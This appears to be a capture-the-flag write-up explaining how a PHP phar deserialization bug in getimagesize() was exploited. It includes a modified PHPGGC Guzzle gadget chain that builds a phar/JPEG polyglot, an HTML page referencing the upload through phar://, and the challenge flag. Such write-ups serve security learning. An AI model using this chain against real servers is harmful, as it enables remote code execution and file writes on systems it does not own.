| 1 | +# Web 05 |
| 2 | +The challenge has source code (luckily). |
| 3 | + |
| 4 | +We can trigger deserialization because of following vulnerable code: |
| 5 | +``` |
| 6 | + try { |
| 7 | + if ($imageInfo['Height'] && $imageInfo['Width']) { |
| 8 | + $height = $imageInfo['Height']; |
| 9 | + $width = $imageInfo['Width']; |
| 10 | + } else { |
| 11 | + list($width, $height) = getimagesize($image); |
| 12 | + } |
| 13 | + |
| 14 | +``` |
| 15 | +`getimagesize()` accepts attacker controllable URI. If we pass `phar://` scheme it would trigger phar deserialization. |
| 16 | + |
| 17 | +One more thing we need to care of is our phar archive must be a valid image (or at least look like it). There's a known solution for this problem. |
| 18 | + |
| 19 | +The server uses `http guzzle` that again, fortunately for us, has needed gadget achieve RCE on the server. |
| 20 | +The `php-ggc` framework contains a generator code that is changed so that it would generate phar/image polyglot. |
| 21 | + |
| 22 | +The modified code is shown below: |
| 23 | +``` |
| 24 | +<?php |
| 25 | +
|
| 26 | +namespace GadgetChain\Guzzle; |
| 27 | +
|
| 28 | +class FW1 extends \PHPGGC\GadgetChain\FileWrite |
| 29 | +{ |
| 30 | + public static $version = '6.0.0 <= 6.3.3+'; |
| 31 | + public static $vector = '__destruct'; |
| 32 | + public static $author = 'cf'; |
| 33 | +
|
| 34 | + public function generate(array $parameters) |
| 35 | + { |
| 36 | + $path = $parameters['remote_path']; |
| 37 | + $data = $parameters['data']; |
| 38 | + $a = new \GuzzleHttp\Cookie\FileCookieJar($path, $data); |
| 39 | + //unlink('pwn.phar'); |
| 40 | + $p = new \Phar('pwn.phar', 0); |
| 41 | + $p['file.txt'] = 'test'; |
| 42 | + $p->setMetadata($a); |
| 43 | + $p->setStub("\xff\xd8\xff\xe0\x0a<?php __HALT_COMPILER(); ?>"); |
| 44 | + } |
| 45 | +} |
| 46 | +
|
| 47 | +``` |
| 48 | + |
| 49 | +We upload this "image" to server and record the path. |
| 50 | +Then we generate html page that would point to it. |
| 51 | +``` |
| 52 | +<html> |
| 53 | +<head></head> |
| 54 | +pwn image here |
| 55 | +<img src=phar:///app/upload/af55k6peln8ni9270eut7i8uqr/73f2a4aa40cf38e647d802bc.jpg> |
| 56 | +<body></body> |
| 57 | +</html> |
| 58 | +``` |
| 59 | +Then we fetch image from our server and get RCE. |
| 60 | + |
| 61 | +## Flag |
| 62 | +`WhiteHat{ph4r_d3_w1th_4_t1ny_b4ck_do0r_7fc88491}` |